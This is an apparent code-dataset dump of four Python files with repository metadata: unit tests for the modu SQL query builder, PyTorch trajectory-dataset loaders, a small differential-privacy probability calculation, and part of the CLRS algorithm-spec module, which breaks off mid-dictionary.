| 0
| 0
| 0
|
0
| 7
|
0c96f9e72a2aca181cc738d01b7364b1ec62631c
| 7,863
|
py
|
Python
|
src/modu/test/test_sql.py
|
philchristensen/modu
|
795f3bc413956b98522ac514dafe35cbab0d57a3
|
[
"MIT"
] | null | null | null |
src/modu/test/test_sql.py
|
philchristensen/modu
|
795f3bc413956b98522ac514dafe35cbab0d57a3
|
[
"MIT"
] | null | null | null |
src/modu/test/test_sql.py
|
philchristensen/modu
|
795f3bc413956b98522ac514dafe35cbab0d57a3
|
[
"MIT"
] | null | null | null |
# modu
# Copyright (c) 2006-2010 Phil Christensen
# http://modu.bubblehouse.org
#
#
# See LICENSE for details
from twisted.trial import unittest
from modu.persist import sql
class SQLTestCase(unittest.TestCase):
    """Unit tests for the modu.persist.sql query-building helpers.

    Bug fixed relative to the original: every failure message interpolated
    the *sql module object* ('%s' % (sql, ...)) instead of the query under
    test, so a failing test printed a useless module repr. All comparisons
    now go through assertQuery, which reports the actual generated SQL.
    """

    def setUp(self):
        # No shared fixtures are required by these tests.
        pass

    def tearDown(self):
        pass

    def assertQuery(self, query, expecting):
        """Fail unless *query* equals *expecting*, showing the generated SQL."""
        self.assertEqual(query, expecting,
                         'Got "%s" when expecting "%s"' % (query, expecting))

    def test_interp_args_1(self):
        query = sql.interp("SELECT * FROM some_table WHERE a = %s AND b = %s", 1, 'something')
        expecting = "SELECT * FROM some_table WHERE a = %s AND b = %s" % (1, repr('something'))
        self.assertQuery(query, expecting)

    def test_interp_args_list(self):
        query = sql.interp("SELECT * FROM some_table WHERE a IN %s AND b = %s", [1,2,3], 'something')
        self.assertQuery(query, "SELECT * FROM some_table WHERE a IN (1,2,3) AND b = 'something'")

    def test_build_delete(self):
        query = sql.build_delete('table', {'col1':'col1_data', 'col2':'col2_data'})
        self.assertQuery(query, "DELETE FROM `table` WHERE `col1` = 'col1_data' AND `col2` = 'col2_data'")

    def test_build_delete2(self):
        query = sql.build_delete('table', col1='col1_data', col2='col2_data')
        self.assertQuery(query, "DELETE FROM `table` WHERE `col1` = 'col1_data' AND `col2` = 'col2_data'")

    def test_build_insert(self):
        query = sql.build_insert('table', {'col2':'col2_data', 'col1':sql.RAW("ENCRYPT('something')")})
        self.assertQuery(query, "INSERT INTO `table` (`col1`, `col2`) VALUES (ENCRYPT('something'), 'col2_data')")

    def test_build_insert2(self):
        query = sql.build_insert('table', col2='col2_data', col1=sql.RAW("ENCRYPT('something')"))
        self.assertQuery(query, "INSERT INTO `table` (`col1`, `col2`) VALUES (ENCRYPT('something'), 'col2_data')")

    def test_build_multiple_insert(self):
        query = sql.build_insert('table', [{'col2':'col2_data', 'col1':sql.RAW("ENCRYPT('something')")}, {'col2':'col2_data', 'col1':sql.RAW("ENCRYPT('something')")}])
        self.assertQuery(query, "INSERT INTO `table` (`col1`, `col2`) VALUES (ENCRYPT('something'), 'col2_data'), (ENCRYPT('something'), 'col2_data')")

    def test_build_insert_dot_syntax(self):
        query = sql.build_insert('db.table', {'col2':'col2_data', 'col1':sql.RAW("ENCRYPT('something')")})
        self.assertQuery(query, "INSERT INTO db.`table` (`col1`, `col2`) VALUES (ENCRYPT('something'), 'col2_data')")

    def test_build_insert_raw(self):
        query = sql.build_insert('table', {'col2':'col2_data', 'col1':'col1_data'})
        self.assertQuery(query, "INSERT INTO `table` (`col1`, `col2`) VALUES ('col1_data', 'col2_data')")

    def test_build_replace(self):
        query = sql.build_replace('table', {'col2':'col2_data', 'col1':'col1_data'})
        self.assertQuery(query, "REPLACE INTO `table` SET `col1` = 'col1_data', `col2` = 'col2_data'")

    def test_build_replace2(self):
        query = sql.build_replace('table', col2='col2_data', col1='col1_data')
        self.assertQuery(query, "REPLACE INTO `table` SET `col1` = 'col1_data', `col2` = 'col2_data'")

    def test_build_replace_raw(self):
        query = sql.build_replace('table', {'col2':'col2_data', 'col1':sql.RAW("ENCRYPT('something')")})
        self.assertQuery(query, "REPLACE INTO `table` SET `col1` = ENCRYPT('something'), `col2` = 'col2_data'")

    def test_build_select_dot_syntax(self):
        query = sql.build_select('db.table', {'t.col2':'col2_data', 's.col1':'col1_data'})
        self.assertQuery(query, "SELECT * FROM db.`table` WHERE s.`col1` = 'col1_data' AND t.`col2` = 'col2_data'")

    def test_build_select(self):
        query = sql.build_select('table', {'col2':'col2_data', 'col1':'col1_data'})
        self.assertQuery(query, "SELECT * FROM `table` WHERE `col1` = 'col1_data' AND `col2` = 'col2_data'")

    def test_build_select2(self):
        query = sql.build_select('table', col2='col2_data', col1='col1_data')
        self.assertQuery(query, "SELECT * FROM `table` WHERE `col1` = 'col1_data' AND `col2` = 'col2_data'")

    def test_build_select_order(self):
        query = sql.build_select('table', {'col1':'col1_data', 'col2':'col2_data', '__order_by':'id DESC'})
        self.assertQuery(query, "SELECT * FROM `table` WHERE `col1` = 'col1_data' AND `col2` = 'col2_data' ORDER BY id DESC")

    def test_build_select_distinct(self):
        query = sql.build_select('table', {'col1':'col1_data', 'col2':'col2_data', '__select_keyword':'DISTINCT'})
        self.assertQuery(query, "SELECT DISTINCT * FROM `table` WHERE `col1` = 'col1_data' AND `col2` = 'col2_data'")

    def test_build_select_in(self):
        query = sql.build_select('table', {'col1':['col1_data', 'col2_data']})
        self.assertQuery(query, "SELECT * FROM `table` WHERE `col1` IN ('col1_data', 'col2_data')")

    def test_build_select_not_in(self):
        query = sql.build_select('table', {'col1':sql.NOT(['col1_data', 'col2_data'])})
        self.assertQuery(query, "SELECT * FROM `table` WHERE `col1` NOT IN ('col1_data', 'col2_data')")

    def test_build_select_in_limit(self):
        query = sql.build_select('table', {'col1':['col1_data', 'col2_data'], '__limit':5})
        self.assertQuery(query, "SELECT * FROM `table` WHERE `col1` IN ('col1_data', 'col2_data') LIMIT 5")

    def test_build_select_none(self):
        query = sql.build_select('table', {'col1':None})
        self.assertQuery(query, "SELECT * FROM `table` WHERE ISNULL(`col1`)")

    def test_build_select_raw(self):
        query = sql.build_select('table', {'col1':sql.RAW("%s = ENCRYPT('something', SUBSTRING(col1,1,2))")})
        self.assertQuery(query, "SELECT * FROM `table` WHERE `col1` = ENCRYPT('something', SUBSTRING(col1,1,2))")

    def test_build_select_not(self):
        query = sql.build_select('table', {'col1':sql.NOT("somestring")})
        self.assertQuery(query, "SELECT * FROM `table` WHERE `col1` <> 'somestring'")

    def test_build_select_gt(self):
        query = sql.build_select('table', {'col1':sql.GT("somestring")})
        self.assertQuery(query, "SELECT * FROM `table` WHERE `col1` > 'somestring'")

    def test_build_select_lt(self):
        query = sql.build_select('table', {'col1':sql.LT("somestring")})
        self.assertQuery(query, "SELECT * FROM `table` WHERE `col1` < 'somestring'")
| 54.986014
| 162
| 0.679639
| 1,057
| 7,863
| 4.894986
| 0.083254
| 0.058755
| 0.060302
| 0.159451
| 0.915539
| 0.90143
| 0.860263
| 0.842675
| 0.806919
| 0.79223
| 0
| 0.024993
| 0.129849
| 7,863
| 142
| 163
| 55.373239
| 0.731219
| 0.012336
| 0
| 0.327103
| 0
| 0.102804
| 0.434077
| 0.016884
| 0
| 0
| 0
| 0
| 0
| 1
| 0.252336
| false
| 0.018692
| 0.018692
| 0
| 0.280374
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0cc733c7c93e0b891d4223fff0ef3243c59df05e
| 6,366
|
py
|
Python
|
notebooks/dataset_custom_z.py
|
prajwalresearch/rearrangement
|
7a430fe320dcea42f47569ff3126793e26e986d7
|
[
"BSD-3-Clause"
] | null | null | null |
notebooks/dataset_custom_z.py
|
prajwalresearch/rearrangement
|
7a430fe320dcea42f47569ff3126793e26e986d7
|
[
"BSD-3-Clause"
] | null | null | null |
notebooks/dataset_custom_z.py
|
prajwalresearch/rearrangement
|
7a430fe320dcea42f47569ff3126793e26e986d7
|
[
"BSD-3-Clause"
] | null | null | null |
import numpy as np
import torch
import pandas as pd
from torch.utils.data.dataset import Dataset
import pickle
import pdb
# goal - (x1, y1)
# start - (x2, y2)
# cost_joint - 2.34
class TrajectoryDataset_customScipy(Dataset):
    """Dataset of (start, goal, cost, joint trajectory) samples produced by
    a SciPy-based planner.

    Each of "dataScipy.pkl" and "dataScipy2.pkl" holds many records written
    by repeated pickle.dump calls on the same file, so loading reads each
    stream until it is exhausted.

    Fixes relative to the original: the bare ``except:`` (which silently
    swallowed *every* error, including corrupt-record UnpicklingError and
    KeyboardInterrupt) is narrowed to the EOFError that pickle.load raises
    at end of stream; the redundant ``f.close()`` inside ``with`` is gone;
    the duplicated per-file loading code is a single loop.
    """

    def __init__(self):
        self.training_data = []
        for path in ("dataScipy.pkl", "dataScipy2.pkl"):
            with open(path, 'rb') as f:
                try:
                    # Keep loading sequentially dumped records until EOF.
                    while True:
                        self.training_data.append(pickle.load(f))
                except EOFError:
                    pass
        self.itr = 0  # kept for backward compatibility; unused here

    def __len__(self):
        return len(self.training_data)

    def __getitem__(self, index):
        """Return (start, goal, net_input, cost, start_joint, end_joint).

        start/goal are the first three components of the recorded positions
        as float64 torch tensors; net_input is their concatenation;
        start_joint/end_joint are the first/last columns of the recorded
        joint-space trajectory.
        """
        rec = self.training_data[index]
        start = np.array(rec['start_position'][:3], dtype=np.float64)
        goal = np.array(rec['goal_position'][:3], dtype=np.float64)
        net_input = torch.from_numpy(np.concatenate((start, goal)))
        cost = rec['cost_j']
        traj = rec['trajectory']
        # First and last trajectory columns = start/end joint configurations.
        start_joint = torch.from_numpy(np.array(traj[:, 0]))
        end_joint = torch.from_numpy(np.array(traj[:, -1]))
        return (torch.from_numpy(start), torch.from_numpy(goal),
                net_input, cost, start_joint, end_joint)
class TrajectoryDataset_custom(Dataset):
    """Trajectory dataset backed by a single pickled list of record dicts.

    Each record carries 'start_position', 'goal_postiion' (sic),
    'cost_j' and a 2-D 'trajectory' array of joint configurations.
    """

    def __init__(self, file_path):
        # The whole dataset is one pickled object (a sequence of dicts).
        with open(file_path, 'rb') as handle:
            self.training_data = pickle.load(handle)

    def __len__(self):
        return len(self.training_data)

    def __getitem__(self, index):
        """Return (start, goal, net_input, cost, start_joint, end_joint)."""
        sample = self.training_data[index]
        # NOTE(review): the records really do use the misspelled key
        # 'goal_postiion' -- confirm against the data generator before renaming.
        start_np = np.array(sample['start_position'][:3], dtype=np.float64)
        goal_np = np.array(sample['goal_postiion'][:3], dtype=np.float64)
        net_input = torch.from_numpy(np.concatenate((start_np, goal_np)))
        trajectory = sample['trajectory']
        first_cfg = torch.from_numpy(np.array(trajectory[:, 0]))
        # NOTE(review): [:, :-1] keeps *all but the last* column here, while
        # the sibling class uses [:, -1] (last column only) -- looks like a
        # possible bug; verify the intended meaning before changing.
        tail_cfgs = torch.from_numpy(np.array(trajectory[:, :-1]))
        return (torch.from_numpy(start_np), torch.from_numpy(goal_np),
                net_input, sample['cost_j'], first_cfg, tail_cfgs)
class TrajectoryDataset_custom_old_1(Dataset):
    """Dataset over pickled (start_xy, goal_xy, cost) tuples."""

    def __init__(self, file_path):
        with open(file_path, 'rb') as f:
            self.training_data = pickle.load(f)

    def __len__(self):
        return len(self.training_data)

    def __getitem__(self, index):
        """Return (start, goal, net_input, cost) for one record."""
        record = self.training_data[index]
        start = np.array([record[0][0], record[0][1]], dtype=np.float64)
        goal = np.array([record[1][0], record[1][1]], dtype=np.float64)
        net_input = torch.from_numpy(np.concatenate((start, goal)))
        cost = record[2]
        return torch.from_numpy(start), torch.from_numpy(goal), net_input, cost
class TrajectoryDataset_custom_old(Dataset):
    """CSV-backed dataset; the cost is the Euclidean distance between the
    start and goal joint angles (theta1, theta2)."""

    def __init__(self, file_path):
        frame = pd.read_csv(file_path)
        self.training_file = frame
        self.start_x = frame['start_x']
        self.start_y = frame['start_y']
        self.start_theta1 = frame['start_theta1']
        self.start_theta2 = frame['start_theta2']
        self.goal_x = frame['goal_x']
        self.goal_y = frame['goal_y']
        self.goal_theta1 = frame['goal_theta1']
        self.goal_theta2 = frame['goal_theta2']

    def __len__(self):
        return len(self.start_x)

    def __getitem__(self, index):
        """Return (start, goal, net_input, cost) for row `index`."""
        start = np.array([self.start_x[index], self.start_y[index]],
                         dtype=np.float64)
        goal = np.array([self.goal_x[index], self.goal_y[index]],
                        dtype=np.float64)
        net_input = torch.from_numpy(np.concatenate((start, goal)))
        start_theta = np.array([self.start_theta1[index],
                                self.start_theta2[index]], dtype=np.float64)
        goal_theta = np.array([self.goal_theta1[index],
                               self.goal_theta2[index]], dtype=np.float64)
        cost = np.linalg.norm(start_theta - goal_theta)
        return torch.from_numpy(start), torch.from_numpy(goal), net_input, cost
| 39.296296
| 130
| 0.634464
| 861
| 6,366
| 4.425087
| 0.098722
| 0.179528
| 0.16378
| 0.170866
| 0.868241
| 0.854068
| 0.787139
| 0.787139
| 0.779528
| 0.779528
| 0
| 0.023246
| 0.222903
| 6,366
| 162
| 131
| 39.296296
| 0.746917
| 0.137135
| 0
| 0.543689
| 0
| 0
| 0.058673
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.116505
| false
| 0.019417
| 0.058252
| 0.038835
| 0.291262
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0cca8a2e5a5ec633bf0a08c3a896f3532fef95e9
| 126
|
py
|
Python
|
Differential_Privacy/Customization/test.py
|
NigeloYang/tensorflow-practice
|
0778f3751512773504eb6c685dfb138aa8e43d40
|
[
"MIT"
] | null | null | null |
Differential_Privacy/Customization/test.py
|
NigeloYang/tensorflow-practice
|
0778f3751512773504eb6c685dfb138aa8e43d40
|
[
"MIT"
] | null | null | null |
Differential_Privacy/Customization/test.py
|
NigeloYang/tensorflow-practice
|
0778f3751512773504eb6c685dfb138aa8e43d40
|
[
"MIT"
] | null | null | null |
import math

# Exponential-mechanism style weighting: each score s in {50, 20, 30} gets
# weight exp(eps * s / 2) with eps = 0.1; print the selection probability
# of the first (highest-scoring) candidate.
EPS = 0.1
weights = [math.exp(EPS * score / 2) for score in (50, 20, 30)]
probability = weights[0] / sum(weights)
print(probability)
| 31.5
| 112
| 0.5
| 27
| 126
| 2.333333
| 0.37037
| 0.444444
| 0.507937
| 0.571429
| 0.68254
| 0.52381
| 0.52381
| 0.52381
| 0.52381
| 0.52381
| 0
| 0.196078
| 0.190476
| 126
| 3
| 113
| 42
| 0.421569
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 9
|
0cead2fd68e2aaa23c63cf0746768deb50de5850
| 23,689
|
py
|
Python
|
clrs/_src/specs.py
|
mohammedElfatihSalah/string-experiments
|
e43bb8db323d2d6da702697d052e8c9dac9782de
|
[
"Apache-2.0"
] | null | null | null |
clrs/_src/specs.py
|
mohammedElfatihSalah/string-experiments
|
e43bb8db323d2d6da702697d052e8c9dac9782de
|
[
"Apache-2.0"
] | 1
|
2021-10-05T16:08:02.000Z
|
2021-10-05T16:08:02.000Z
|
clrs/_src/specs.py
|
LaudateCorpus1/clrs
|
762165c29cf1dc83cc5b075f9ca77985e9223c9e
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2021 DeepMind Technologies Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Algorithm specs.
The "spec" of each algorithm is a static set of `(stage, loc, type)`-tuples.
- `stage`: One of either an `input`, `output` or `hint`
- `location`: Each datum is associated with either the `node`, `edge` or `graph`
- `type`: Either a `scalar`, `categorical`, `mask`, `mask_one` or `pointer`
The dataflow for an algorithm is represented by `(stage, loc, type, data)`
"probes" that are valid under that algorithm's spec. It contains a single
snapshot for each `input` and `output` and a time-series of intermediate
algorithmic states (`hint`).
At minimum, each node contains a `pos` probe that serves as a unique index e.g.
for representing sequential data where appropriate
"""
import enum
import types
from typing import Dict, Tuple
class _OrderedEnum(enum.Enum):
def __lt__(self, other):
assert self.__class__ is other.__class__
return self.value < other.value # pylint: disable=comparison-with-callable
class Stage(_OrderedEnum):
  """Dataflow stage of a probe: algorithm `input`, `output`, or `hint`."""
  INPUT = 'input'
  OUTPUT = 'output'
  HINT = 'hint'
class Location(_OrderedEnum):
  """Where a datum lives: on a `node`, an `edge`, or the whole `graph`."""
  NODE = 'node'
  EDGE = 'edge'
  GRAPH = 'graph'
class Type(_OrderedEnum):
  """Data type of a probe (see the module docstring for the taxonomy)."""
  SCALAR = 'scalar'
  CATEGORICAL = 'categorical'
  MASK = 'mask'
  MASK_ONE = 'mask_one'
  POINTER = 'pointer'
class OutputClass(_OrderedEnum):
  """Integer labels for classification-style outputs."""
  # NOTE(review): MASKED = -1 looks like a sentinel for entries excluded
  # from scoring/loss — confirm against the evaluation code.
  POSITIVE = 1
  NEGATIVE = 0
  MASKED = -1
# A spec maps each named probe to its (stage, location, type) triple.
Spec = Dict[str, Tuple[Stage, Location, Type]]

# The 21 algorithms in this benchmark subset; each also appears as a key
# of SPECS below (SPECS additionally contains algorithms not listed here).
CLRS_21_ALGS = [
    'bellman_ford',
    'bfs',
    'binary_search',
    'bubble_sort',
    'dag_shortest_paths',
    'dfs',
    'dijkstra',
    'find_maximum_subarray_kadane',
    'floyd_warshall',
    'heapsort',
    'insertion_sort',
    'kmp_matcher',
    'matrix_chain_order',
    'minimum',
    'mst_prim',
    'naive_string_matcher',
    'optimal_bst',
    'quickselect',
    'quicksort',
    'task_scheduling',
    'topological_sort',
]
# Static probe specifications, keyed by algorithm name. Each inner dict maps
# a probe name to its (stage, location, type) triple; MappingProxyType makes
# the registry read-only at runtime. Note SPECS covers more algorithms than
# CLRS_21_ALGS (e.g. 'lcs_length', 'activity_selector', 'mst_kruskal').
SPECS = types.MappingProxyType({
    'insertion_sort': {
        'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
        'key': (Stage.INPUT, Location.NODE, Type.SCALAR),
        'pred': (Stage.OUTPUT, Location.NODE, Type.POINTER),
        'pred_h': (Stage.HINT, Location.NODE, Type.POINTER),
        'i': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'j': (Stage.HINT, Location.NODE, Type.MASK_ONE)
    },
    'bubble_sort': {
        'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
        'key': (Stage.INPUT, Location.NODE, Type.SCALAR),
        'pred': (Stage.OUTPUT, Location.NODE, Type.POINTER),
        'pred_h': (Stage.HINT, Location.NODE, Type.POINTER),
        'i': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'j': (Stage.HINT, Location.NODE, Type.MASK_ONE)
    },
    'heapsort': {
        'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
        'key': (Stage.INPUT, Location.NODE, Type.SCALAR),
        'pred': (Stage.OUTPUT, Location.NODE, Type.POINTER),
        'pred_h': (Stage.HINT, Location.NODE, Type.POINTER),
        'parent': (Stage.HINT, Location.NODE, Type.POINTER),
        'i': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'j': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'largest': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'heap_size': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'phase': (Stage.HINT, Location.GRAPH, Type.CATEGORICAL)
    },
    'quicksort': {
        'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
        'key': (Stage.INPUT, Location.NODE, Type.SCALAR),
        'pred': (Stage.OUTPUT, Location.NODE, Type.POINTER),
        'pred_h': (Stage.HINT, Location.NODE, Type.POINTER),
        'p': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'r': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'i': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'j': (Stage.HINT, Location.NODE, Type.MASK_ONE)
    },
    'quickselect': {
        'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
        'key': (Stage.INPUT, Location.NODE, Type.SCALAR),
        'median': (Stage.OUTPUT, Location.NODE, Type.MASK_ONE),
        'pred_h': (Stage.HINT, Location.NODE, Type.POINTER),
        'p': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'r': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'i': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'j': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'i_rank': (Stage.HINT, Location.GRAPH, Type.SCALAR),
        'target': (Stage.HINT, Location.GRAPH, Type.SCALAR)
    },
    'minimum': {
        'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
        'key': (Stage.INPUT, Location.NODE, Type.SCALAR),
        'min': (Stage.OUTPUT, Location.NODE, Type.MASK_ONE),
        'pred_h': (Stage.HINT, Location.NODE, Type.POINTER),
        'min_h': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'i': (Stage.HINT, Location.NODE, Type.MASK_ONE)
    },
    'binary_search': {
        'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
        'key': (Stage.INPUT, Location.NODE, Type.SCALAR),
        'target': (Stage.INPUT, Location.GRAPH, Type.SCALAR),
        'return': (Stage.OUTPUT, Location.NODE, Type.MASK_ONE),
        'pred_h': (Stage.HINT, Location.NODE, Type.POINTER),
        'low': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'high': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'mid': (Stage.HINT, Location.NODE, Type.MASK_ONE)
    },
    'find_maximum_subarray': {
        'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
        'key': (Stage.INPUT, Location.NODE, Type.SCALAR),
        'start': (Stage.OUTPUT, Location.NODE, Type.MASK_ONE),
        'end': (Stage.OUTPUT, Location.NODE, Type.MASK_ONE),
        'pred_h': (Stage.HINT, Location.NODE, Type.POINTER),
        'low': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'high': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'mid': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'left_low': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'left_high': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'left_sum': (Stage.HINT, Location.GRAPH, Type.SCALAR),
        'right_low': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'right_high': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'right_sum': (Stage.HINT, Location.GRAPH, Type.SCALAR),
        'cross_low': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'cross_high': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'cross_sum': (Stage.HINT, Location.GRAPH, Type.SCALAR),
        'ret_low': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'ret_high': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'ret_sum': (Stage.HINT, Location.GRAPH, Type.SCALAR),
        'i': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'j': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'sum': (Stage.HINT, Location.GRAPH, Type.SCALAR),
        'left_x_sum': (Stage.HINT, Location.GRAPH, Type.SCALAR),
        'right_x_sum': (Stage.HINT, Location.GRAPH, Type.SCALAR),
        'phase': (Stage.HINT, Location.GRAPH, Type.CATEGORICAL)
    },
    'find_maximum_subarray_kadane': {
        'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
        'key': (Stage.INPUT, Location.NODE, Type.SCALAR),
        'start': (Stage.OUTPUT, Location.NODE, Type.MASK_ONE),
        'end': (Stage.OUTPUT, Location.NODE, Type.MASK_ONE),
        'pred_h': (Stage.HINT, Location.NODE, Type.POINTER),
        'best_low': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'best_high': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'best_sum': (Stage.HINT, Location.GRAPH, Type.SCALAR),
        'i': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'j': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'sum': (Stage.HINT, Location.GRAPH, Type.SCALAR)
    },
    'matrix_chain_order': {
        'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
        'p': (Stage.INPUT, Location.NODE, Type.SCALAR),
        's': (Stage.OUTPUT, Location.EDGE, Type.POINTER),
        'pred_h': (Stage.HINT, Location.NODE, Type.POINTER),
        'm': (Stage.HINT, Location.EDGE, Type.SCALAR),
        's_h': (Stage.HINT, Location.EDGE, Type.POINTER),
        'msk': (Stage.HINT, Location.EDGE, Type.MASK)
    },
    'lcs_length': {
        'string': (Stage.INPUT, Location.NODE, Type.MASK),
        'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
        'key': (Stage.INPUT, Location.NODE, Type.CATEGORICAL),
        'b': (Stage.OUTPUT, Location.EDGE, Type.CATEGORICAL),
        'pred_h': (Stage.HINT, Location.NODE, Type.POINTER),
        'b_h': (Stage.HINT, Location.EDGE, Type.CATEGORICAL),
        'c': (Stage.HINT, Location.EDGE, Type.SCALAR)
    },
    'optimal_bst': {
        'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
        'p': (Stage.INPUT, Location.NODE, Type.SCALAR),
        'q': (Stage.INPUT, Location.NODE, Type.SCALAR),
        'root': (Stage.OUTPUT, Location.EDGE, Type.POINTER),
        'pred_h': (Stage.HINT, Location.NODE, Type.POINTER),
        'root_h': (Stage.HINT, Location.EDGE, Type.POINTER),
        'e': (Stage.HINT, Location.EDGE, Type.SCALAR),
        'w': (Stage.HINT, Location.EDGE, Type.SCALAR),
        'msk': (Stage.HINT, Location.EDGE, Type.MASK)
    },
    'activity_selector': {
        'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
        's': (Stage.INPUT, Location.NODE, Type.SCALAR),
        'f': (Stage.INPUT, Location.NODE, Type.SCALAR),
        'selected': (Stage.OUTPUT, Location.NODE, Type.MASK),
        'pred_h': (Stage.HINT, Location.NODE, Type.POINTER),
        'selected_h': (Stage.HINT, Location.NODE, Type.MASK),
        'm': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'k': (Stage.HINT, Location.NODE, Type.MASK_ONE)
    },
    'task_scheduling': {
        'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
        'd': (Stage.INPUT, Location.NODE, Type.SCALAR),
        'w': (Stage.INPUT, Location.NODE, Type.SCALAR),
        'selected': (Stage.OUTPUT, Location.NODE, Type.MASK),
        'pred_h': (Stage.HINT, Location.NODE, Type.POINTER),
        'selected_h': (Stage.HINT, Location.NODE, Type.MASK),
        'i': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        't': (Stage.HINT, Location.GRAPH, Type.SCALAR)
    },
    'dfs': {
        'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
        'A': (Stage.INPUT, Location.EDGE, Type.SCALAR),
        'adj': (Stage.INPUT, Location.EDGE, Type.MASK),
        'pi': (Stage.OUTPUT, Location.NODE, Type.POINTER),
        'pi_h': (Stage.HINT, Location.NODE, Type.POINTER),
        'color': (Stage.HINT, Location.NODE, Type.CATEGORICAL),
        'd': (Stage.HINT, Location.NODE, Type.SCALAR),
        'f': (Stage.HINT, Location.NODE, Type.SCALAR),
        's_prev': (Stage.HINT, Location.NODE, Type.POINTER),
        's': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'u': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'v': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        's_last': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'time': (Stage.HINT, Location.GRAPH, Type.SCALAR)
    },
    'topological_sort': {
        'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
        'A': (Stage.INPUT, Location.EDGE, Type.SCALAR),
        'adj': (Stage.INPUT, Location.EDGE, Type.MASK),
        'topo': (Stage.OUTPUT, Location.NODE, Type.POINTER),
        'topo_head': (Stage.OUTPUT, Location.NODE, Type.MASK_ONE),
        'topo_h': (Stage.HINT, Location.NODE, Type.POINTER),
        'topo_head_h': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'color': (Stage.HINT, Location.NODE, Type.CATEGORICAL),
        's_prev': (Stage.HINT, Location.NODE, Type.POINTER),
        's': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'u': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'v': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        's_last': (Stage.HINT, Location.NODE, Type.MASK_ONE)
    },
    'strongly_connected_components': {
        'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
        'A': (Stage.INPUT, Location.EDGE, Type.SCALAR),
        'adj': (Stage.INPUT, Location.EDGE, Type.MASK),
        'scc_id': (Stage.OUTPUT, Location.NODE, Type.POINTER),
